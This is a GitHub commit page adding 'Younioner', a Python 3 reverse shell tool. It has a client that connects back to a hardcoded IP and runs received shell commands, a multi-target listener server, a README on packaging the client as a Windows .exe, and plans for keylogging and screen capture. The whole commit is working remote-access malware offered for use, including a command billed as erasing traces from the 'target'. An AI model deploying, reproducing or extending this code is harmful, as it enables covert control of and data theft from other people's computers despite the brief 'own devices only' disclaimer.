Skip to content

Commit f7cd87f

Browse files
committed
add python3 reverse shell
1 parent 06484b6 commit f7cd87f

File tree

5 files changed

+372
-0
lines changed

5 files changed

+372
-0
lines changed

python/python3/Client.py

+77
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,77 @@
1+
from socket import *
2+
import subprocess
3+
import os
4+
import time
5+
import sys
6+
7+
ip = '192.168.1.88' # server ip, which you want to connect to
8+
port = 4343 # the port needs to be the same as server.py port in order to connect with server
9+
10+
class Client:
11+
def __init__(self, _host, _port=3434):
12+
self.host = _host
13+
self.port = _port
14+
self.s = None
15+
16+
self.launch()
17+
18+
# run younioner
19+
def launch(self):
20+
try:
21+
self.open_socket()
22+
self.receive_commands()
23+
self.chat()
24+
25+
except error as e:
26+
time.sleep(6)
27+
self.launch()
28+
29+
# will create the socket
30+
def open_socket(self):
31+
try:
32+
self.s = socket(AF_INET, SOCK_STREAM)
33+
self.s.connect((self.host, self.port))
34+
35+
except:
36+
time.sleep(5)
37+
self.open_socket()
38+
39+
# receive commands from the Server
40+
def receive_commands(self):
41+
try:
42+
while True:
43+
data = self.s.recv(1024)
44+
striped_data = data[:].strip().decode("utf-8")
45+
46+
if striped_data[:2] == 'cd':
47+
os.chdir(striped_data[3:])
48+
49+
if len(data) > 0:
50+
try:
51+
cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stderr=subprocess.PIPE,
52+
stdout=subprocess.PIPE, stdin=subprocess.PIPE)
53+
result = str(cmd.stdout.read() + cmd.stderr.read(), "utf-8")
54+
55+
self.s.send(str.encode(result + str(os.getcwd()) + " > "))
56+
except:
57+
result = "Command not recognized \n"
58+
self.s.send(str.encode(result + str(os.getcwd()) + " > "))
59+
60+
61+
# this condition will work when the user quit server.py
62+
if striped_data == "end-of-session":
63+
time.sleep(2)
64+
self.s.close()
65+
sys.exit(0)
66+
os._exit(0)
67+
exit(0)
68+
quit(0)
69+
70+
self.s.close()
71+
72+
except:
73+
time.sleep(5)
74+
self.receive_commands()
75+
76+
if __name__ == '__main__':
77+
c = Client(ip, port)

python/python3/README.md

+53
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,53 @@
1+
# Younioner
2+
Younioner is **multipale client** reverse shell created by Ayoub Ouakkaha, which is now under development
3+
4+
## How to use it
5+
once you download the project(click on download zip button )
6+
You can run this directly as python3 script
7+
* **windows**
8+
just write the command below in command prompt
9+
`python Server.py`
10+
to run Client just change Server.py with Client.py module:
11+
`python Client.py`
12+
13+
* **Linux**
14+
you can run this also inside linux OS using bellow commands
15+
`python3 Server.py`
16+
to run Client just change Server.py with Client.py module:
17+
`python3 Client.py`
18+
19+
## Make it Executable:
20+
instead of running python client.py every time we want to run the client module you can do this inside **windows** Using Py2Exe Library, after bellow proccess you will have .exe ready to run in anywhere without python, just follow me
21+
22+
1. download and install the library using this link [sourceforge](https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/)
23+
24+
2. with in command Prompt and inside the directory which you download the Younioner into run this command:
25+
`python setup.py install`
26+
3. that's it now you will be able to see dist folder just open it and you find **Client.exe** executable(its the one)
27+
28+
To Do this Linux i only know one library that could get the job done which is **PyInstaller**, you can find more about this process using this link **[pythonhosted's website](https://pythonhosted.org/PyInstaller/)**
29+
30+
## Younioner Features
31+
Younioner introduce tons of awesome Features, include:
32+
33+
1. **Multiple Client Support:** this is really important when you're Dealing with all of targets, this feature allow you to take control of each connected target in individual.
34+
2. **Easy interface:** up to this moment **Younioner** project uses terminal or command prompt in windows, we plan to switch to GUI(probably in incoming releases), anyway interface is really simple
35+
3. **Easy commands**: yes no more stupid and complicated commands, **Younioner** offers you easy and realistic commands
36+
4. **All Platforms :** Younioner support all different platforms which includes Mobile(tested on android), Windows, Linux, OS X...
37+
5. **Under Developpement:** Younioner is under developpement which means a lot features are coming soon
38+
39+
### so what is it Reverse Shell
40+
A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved.
41+
42+
### get evolved with the project
43+
we plan to make Younioner a great project, but this won't happen without a cooperation from other developers.
44+
so feel free to join us..
45+
46+
### Important
47+
this project was made for security purposes.
48+
you have no right to use this in any device other than yours
49+
50+
### Contact Me
51+
You can use this email to reach me **[email protected]**
52+
53+
**MADE WITH PASSION AND LOVE**

python/python3/Server.py

+220
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,220 @@
1+
from socket import *
2+
import time
3+
import threading
4+
import sys
5+
import os
6+
from queue import Queue
7+
8+
queue = Queue()
9+
host = '192.168.1.88' # your computer ip
10+
port = 4343
11+
12+
13+
class Server:
14+
def __init__(self, _host, _port=3434, _max_client=20):
15+
16+
# Variables used in this class are here
17+
self.host = _host
18+
self.port = _port
19+
self.max_client = _max_client # max amount of expected connections
20+
21+
# once any client connected
22+
self.all_connection = [] # the connections will be stored here.
23+
self.all_addresses = [] # the addresses will be stored here.
24+
25+
# create socket
26+
def open_socket(self):
27+
try:
28+
self.s = socket(AF_INET, SOCK_STREAM)
29+
self.s.bind((self.host, self.port))
30+
31+
logo = "__ __ _ ____ \n" \
32+
"\ \ / /__ _ _ _ __ (_) ___ _ __ ___| _ \ \n" \
33+
" \ V / _ \| | | | '_ \| |/ _ \| '_ \ / _ \ |_) | \n" \
34+
" | | (_) | |_| | | | | | (_) | | | | __/ _ < \n" \
35+
" |_|\___/ \__,_|_| |_|_|\___/|_| |_|\___|_| \_\ \n"
36+
37+
print("\n\tWelcome to Younioner V1.1")
38+
print(logo)
39+
print('Created by Ayoub Ouakkaha, please visit our website www.ouakkaha.com')
40+
print('\ncontact us at [email protected], type help to display available commands.')
41+
42+
# listen for one connection :)
43+
self.s.listen(self.max_client)
44+
45+
except error as e:
46+
print("** Oops Something went wrong error code ", e)
47+
time.sleep(5) # wait for 5s and try again
48+
self.open_socket()
49+
50+
# accept incoming connection
51+
def accept_connection(self):
52+
for c in self.all_connection: # close the connection list
53+
c.close()
54+
del self.all_connection[:] # clean connection list
55+
del self.all_addresses[:] # clean addresses list
56+
57+
while True:
58+
try:
59+
conn, address = self.s.accept()
60+
conn.setblocking(1)
61+
self.all_connection.append(conn)
62+
self.all_addresses.append(address)
63+
print("\n* new Connection has been established from {} on {}".format(address[0], address[1]))
64+
print("\nYounioner> ", end="")
65+
except error as e:
66+
print("something went wrong while accepting new connection\n error code: {} \n".format(str(e)))
67+
68+
# Interactive shell for sending command remotely
69+
def start_younioner(self):
70+
71+
while True:
72+
cmd = str(input("Younioner> "))
73+
cmd = cmd.lower()
74+
cmd_stripped = cmd.strip()
75+
76+
if cmd.strip() == 'list':
77+
self.list_connections()
78+
continue
79+
elif cmd.strip() == "help":
80+
self.displayHelp()
81+
82+
elif cmd_stripped.startswith("select"): # check command start with `select` word
83+
conn = self.get_target(cmd)
84+
if conn is not None:
85+
self.send_commands(conn)
86+
elif cmd_stripped == "quit":
87+
self.exit()
88+
89+
else:
90+
print("{} Command not recognized..".format(cmd))
91+
92+
# Display the help menu
93+
def displayHelp(self):
94+
"""Display The help menu"""
95+
help = "\nthis section will help to understand the basic commands: " \
96+
"\n\nlist............ It will list availabel connection..Usage(just type : `list`)"\
97+
"\n\nselect.......... used to select a connection to target.. the target number needs be availabel on list section Usage(select 1) or change the number 1 to the target ID"\
98+
"\n\nquit............ used to close the current connection .. or if you don't have one it will close the script"\
99+
"\n\nhelp............ as you might guess, it will print the help Menu, which you're looking to now.:)"\
100+
"\n\nend-of-session.. this is really advance command..this command will delet your trace from the target command, for example it will delet the current running script on the target command which is(Client) "\
101+
"\n\nIf you liked Our app and you want to help us for providing more and more.. please contact us at [email protected] or visit my site www.ouakkaha.com\nanyway thanks for using my app, be sure to have a greate day :)"
102+
103+
104+
print(help)
105+
# Exit Reverse Shell
106+
def exit(self):
107+
for c in self.all_connection:
108+
try:
109+
c.send(str.encode("end-of-session"))
110+
c.shutdown(2)
111+
c.close()
112+
except Exception as e:
113+
print('Could not close connection ' + str(e))
114+
115+
self.s.close()
116+
print("\n Good By, please have a nice day :) ")
117+
118+
# this will be over need but believe me, some times the module refuse to exit..
119+
# this is why i try each of this method cause at the end one of theme should work..
120+
os._exit(0)
121+
sys.exit()
122+
quit(0)
123+
exit(0)
124+
125+
126+
# this will display all current connection
127+
def list_connections(self):
128+
rs = ''
129+
for i, conn in enumerate(self.all_connection): # Enumerate will count number of loop
130+
try: # we will test if conn are working..
131+
conn.send(str.encode(' ')) # send blank to test if conn is working.,
132+
conn.recv(20240)
133+
except: # this will ocure if conn is null
134+
del self.all_connection[i]
135+
del self.all_addresses[i]
136+
continue # go to next loop do not execut the next line..
137+
rs += str(i) + '\t' + str(self.all_addresses[i][0]) + '\t' + str(self.all_addresses[i][1]) + '\n'
138+
139+
140+
print("Currently Available Targets")
141+
print("ID\tIP\t\t\t\tPORT\n" + rs)
142+
143+
# Select a target client
144+
def get_target(self, cmd):
145+
target = cmd.replace('select ', '')
146+
try:
147+
target = int(target)
148+
except:
149+
print("Target index should be integer.")
150+
return None
151+
try:
152+
conn = self.all_connection[target]
153+
except:
154+
print("Not Invalid Selection..")
155+
return None
156+
157+
print("You are now connected to", self.all_addresses[target][0])
158+
print("Younioner.{} >> ".format(self.all_addresses[target][0]), end="")
159+
return conn
160+
161+
# Connect with the target
162+
def send_commands(self, conn):
163+
while True:
164+
try:
165+
cmd = str(input())
166+
167+
if len(cmd) > 0:
168+
conn.send(str.encode(cmd))
169+
client_response = str(conn.recv(20480), "utf-8")
170+
print(client_response, end="")
171+
172+
# confirm quit
173+
if cmd == "quit":
174+
print("\nAre you sure, the socket will be closed for this moment..")
175+
confirm = str.upper(input("\t N / y >> "))
176+
if confirm == "Y":
177+
break
178+
179+
except:
180+
print("[!] Connection was lost ")
181+
break
182+
183+
# Setting up threads
184+
def setup_threads():
185+
server = Server('', port)
186+
for _ in range(2):
187+
t = threading.Thread(target=work, args=(server,))
188+
t.daemon = True # It means when the script got closed the thread also will exit from process
189+
t.start()
190+
return
191+
192+
193+
# Do the next job in the queue(1: handles connection, other sends commands and get response back)
194+
def work(server):
195+
while True:
196+
x = queue.get()
197+
if x == 0: # 0: handles connection
198+
server.open_socket()
199+
server.accept_connection()
200+
if x == 1: # 1: sends commands to target machine
201+
server.start_younioner()
202+
queue.task_done() # [Done] jobs are done with success
203+
return
204+
205+
206+
# Each list item is a new job
207+
def create_jobs():
208+
for x in range(2):
209+
queue.put(x)
210+
queue.join()
211+
return
212+
213+
# the main function
214+
def main():
215+
setup_threads()
216+
create_jobs()
217+
218+
219+
if __name__ == '__main__':
220+
main()

python/python3/about.txt

+19
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,19 @@
1+
2+
\ \ / /__ _ _ _ __ (_) ___ _ __ ___| _ \
3+
\ V / _ \| | | | '_ \| |/ _ \| '_ \ / _ \ |_) |
4+
| | (_) | |_| | | | | | (_) | | | | __/ _ <
5+
|_|\___/ \__,_|_| |_|_|\___/|_| |_|\___|_| \_\
6+
7+
8+
Younioner Version 1.1 - created by Ayoub Ouakkaha.
9+
the ide behind the project is to make a simple tool let you take controle over your devices.
10+
up to now Younioner project is just a reverse shell, but i hope i could add this features in incoming release
11+
* G.U.I support : yes i plan to make the project support graphical user interface..
12+
* Key Capture: yes younioner will include the key capture feature probably this feature will work only in windows.. but we will sya :)
13+
* Screen Capture
14+
* Executable Client: you'll have the option to genrate either client.py or client.exe
15+
16+
please help us to develope the next version of Younioner 1.2
17+
for more contact me on :
18+
19+
thanks in advance.

python/python3/setup.py

+3
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,3 @@
1+
from distutils.core import setup
2+
3+
setup(console=['Client.py'])

0 commit comments

Comments
 (0)